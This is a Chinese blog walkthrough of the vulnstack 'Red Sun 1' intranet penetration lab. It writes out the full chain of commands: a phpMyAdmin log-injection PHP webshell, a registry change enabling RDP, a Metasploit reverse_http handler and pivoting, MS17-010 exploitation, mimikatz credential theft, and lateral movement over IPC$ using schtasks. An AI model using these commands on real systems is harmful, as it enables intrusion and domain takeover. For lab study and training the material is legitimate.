红日(vulnstack)1 内网渗透ATT&CK实战

环境准备

靶机链接:百度网盘 请输入提取码

提取码:sx22

攻击机系统:kali linux 2022.03

网络配置:

win7配置:

kali配置:

kali 192.168.1.108 192.168.111.129 桥接一块,自定义网卡4

win7 192.168.111.128 192.168.52.143 自定义网卡4,自定义网卡3

win8 192.68.52.138 自定义网卡3

win2003 192.168.52.141 自定义网卡3

外网web渗透

1.用dirsearch进行目录扫描

dirsearch -u 192.168.111.128 --exclude-status 400,401,403,404,405,501,503

2.访问后,发现网站绝对路径。

3.访问网址是phpmyadmin的

4.工具爆破用户名密码,成功登录

5.查看是否已开启general 日志

show variables like '%general%';

6.使用set global general_log=on开启general 日志

开启之后数据库所有运行的日志会记录在general_log_file中

7.设置指定日志写入到网站根目录的 111.php 文件

set global general_log_file = 'C:/phpStudy/WWW/l.php';

8.将一句话木马写入 111.php 文件中:

SELECT '<?php eval($_POST[cmd]);?>'

9.蚁剑成功连接,关闭防火墙

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

10.rdesktop 192.168.111.128 远程连接成功

内网渗透

信息收集

1.开启cs,生成木马,上传到蚁剑,执行

2.成功上线cs.进行信息收集

3.发现一个192.168.52.143的网段

4.打印路由信息

5.查看arp信息

6.能都成功ping通52段

渗透2003

1.设置派生监听

2.将cs的shell派生(foreign)到msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.129
set lport 9999
run

3.进行提权操作,再进行添加路由

getsystem

run autoroute -s 192.168.52.0/24

run autoroute -p

4.设置代理

use auxiliary/server/socks_proxy

set srvhost 192.168.111.129

run

5.用ms17-010的use2进行渗透

use 2

set rhosts 192.168.52.141

run

6.成功执行,whomi发现是系统权限。

set command whoami

拿下域控

信息收集

1.主机名为stu1,有四个用户

2.查看域用户

shell net user /domain

3.查看域中的主机名

shell net group "domain computers" /domain

4.查看域控制器主机名

shell net group "domain controllers" /domain

域控名字OWA$

5.查看域控制器的主机名,DNS服务器的地址

shell nslookup -type=srv _ldap._tcp

ipc横向移动

1.创建一个smb监听

创建一个windows exe s 木马,选择smb监听

2.run mimikakz,得到域控密码

3.建立公网主机和域控主机的ipc信任

shell net use \\192.168.52.138\ipc$ "Qwer1234" /user:god\administrator

4.net use 发现建立成功后,上传木马程序

6.利用ipc将木马传到域控上

shell copy beacon.exe \\192.168.52.138\c$

7.创建计划任务并执行

shell schtasks /create /s 192.168.52.138 /tn msbtest /sc onstart /tr c:\beacon.exe /ru system /f

shell schtasks /run /s 192.168.52.138 /i /tn "msbtest"

/s 指定目标ip

/tn 指定计划任务名字

/sc onstart 设定开机启动

/tr 启动应用路径

/ru system 以管理员身份运行

8.link 192.168.52.138 成功上线cs,执行shell whoami 管理员权限,成功拿下!

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值